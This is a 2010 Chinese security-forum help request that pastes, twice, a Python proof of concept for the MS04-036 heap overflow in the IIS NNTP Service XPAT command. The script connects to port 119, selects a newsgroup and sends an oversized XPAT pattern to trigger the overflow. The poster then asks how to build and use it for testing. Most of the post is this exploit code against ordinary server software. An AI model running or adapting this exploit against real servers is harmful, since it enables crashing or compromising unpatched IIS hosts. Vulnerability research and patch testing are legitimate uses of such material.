-
-
[旧帖] 求助:ms04036 0.00雪花
-
2010-3-25 19:08
-
#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
# Lucas Lavarello (lucas at coresecurity dot com)
# Juliano Rizzo (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# www coresecurity com
#--
from socket import *
host = "127.0.0.1"
pat = "C"*1946 + " " + "X"*10
newsgroup = "control.newgroup"
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, 119))
print sock.recv(512)
sock.send("group %s\x0d\x0a" % newsgroup)
print sock.recv(512)
sock.send("xpat From 1-9 %s \x0d\x0a" % pat)
这是我搜到的MS04036代码,帮忙一下 这程序怎么才能编出来 利用 测试一下 谢谢了
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
# Lucas Lavarello (lucas at coresecurity dot com)
# Juliano Rizzo (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# www coresecurity com
#--
from socket import *
host = "127.0.0.1"
pat = "C"*1946 + " " + "X"*10
newsgroup = "control.newgroup"
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, 119))
print sock.recv(512)
sock.send("group %s\x0d\x0a" % newsgroup)
print sock.recv(512)
sock.send("xpat From 1-9 %s \x0d\x0a" % pat)
这是我搜到的MS04036代码,帮忙一下 这程序怎么才能编出来 利用 测试一下 谢谢了
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
